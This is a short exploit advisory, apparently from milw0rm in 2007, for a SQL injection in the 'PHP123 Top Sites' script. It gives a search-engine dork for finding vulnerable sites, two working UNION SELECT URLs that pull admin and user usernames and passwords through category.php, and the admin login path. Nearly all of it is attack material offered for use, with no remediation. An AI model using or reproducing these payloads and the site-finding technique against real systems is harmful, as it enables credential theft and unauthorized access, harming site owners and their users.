--==+================================================================================+==-- --==+ PHP123 Top Sites SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: N/A DORK: allintext:"Browse our directory of our members top sites or create your own for free!" DESCRIPTION: pull out admin/users login credentials EXPLOITS: http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/* http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/* NOTE/TIP: admin login is at /siteadmin/ altavista also returns a few diffrent results, dnt use the allintext: thou. GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org ! --==+================================================================================+==-- --==+ PHP123 Top Sites SQL Injection Vulnerbility +==-- --==+================================================================================+==-- # milw0rm.com [2007-07-28]